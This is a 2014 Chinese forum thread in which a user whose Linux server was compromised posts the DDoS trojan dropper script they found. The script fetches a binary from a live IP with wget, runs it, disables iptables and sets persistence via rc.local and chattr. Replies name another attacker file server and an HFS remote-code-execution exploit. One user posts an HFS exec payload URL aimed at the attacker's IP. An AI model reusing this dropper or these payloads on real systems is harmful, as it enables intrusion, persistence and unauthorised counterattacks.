系统被入侵,被人家植入 DDOS 木马发现一个脚本.

2014-09-16 21:43:23 +08:00
 webjin
#!/bin/bash

DOWNURL="http://183.60.202.209:44335/"
DOWNDIR="/bin/"

run_proc()
{
chmod 777 $DOWNDIR$1
nohup $DOWNDIR$1 > /dev/null 2>&1 &
[ -z "`grep -w \"iptables stop\" /etc/rc.local`" ] && echo "/etc/init.d/iptables stop" >> /etc/rc.local
[ -z "`grep -w $DOWNDIR$1 /etc/rc.local`" ] && echo "$DOWNDIR$1 &" >> /etc/rc.local
[ -f "/etc/$1" ] && chattr -i /etc/$1 && \rm -rf /etc/$1
\cp $DOWNDIR$1 /etc/$1
chattr +i /etc/$1
chattr +i $DOWNDIR$1
}

check_proc()
{
if [ -z "`ps -A|grep -w $1`" ];then
if [ ! -f "$DOWNDIR$1" ];then
wget "$DOWNURL$1" -O "$DOWNDIR$1" > /dev/null 2>&1
fi
if [ -f "$DOWNDIR$1" ];then
run_proc $1
fi
fi
}

while [ 1 ]
do
check_proc "svchost"
sleep 3
done
========================================
http://183.60.202.209:44335 里面有黑客的工具可惜都是编译之后的。
4446 次点击
所在节点    Linux
9 条回复
yoyicue
2014-09-16 21:56:13 +08:00
黑客这么喜欢 HFS 啊
http://61.147.103.185:8089/
Akagi201
2014-09-16 22:10:10 +08:00
lz能说说怎么发现的吗?
semicircle21
2014-09-16 22:18:08 +08:00
同求楼主说说, 怎么发现的..
Bakemono
2014-09-16 22:48:20 +08:00
@yoyicue HFS 刚刚爆出 Remote Code Execution 的漏洞,快反击!
http://www.exploit-db.com/exploits/34668/
izoabr
2014-09-16 22:59:43 +08:00
脚本写得真烂
csx163
2014-09-16 23:55:27 +08:00
估计是用nmap发现的
webjin
2014-09-17 01:53:35 +08:00
@Akagi201 在/etc/rc.local文件里面发现有执行
q397064399
2014-09-17 06:12:38 +08:00
@Bakemono 不知道怎么用 刚才用windows命令 然后urlcode编码 貌似没反应
q397064399
2014-09-17 06:23:04 +08:00
@Bakemono http://183.60.202.209:44335/?search==%00{.exec|cmd%20/c%20shutdown%20-t.}
无反应

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/133857

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX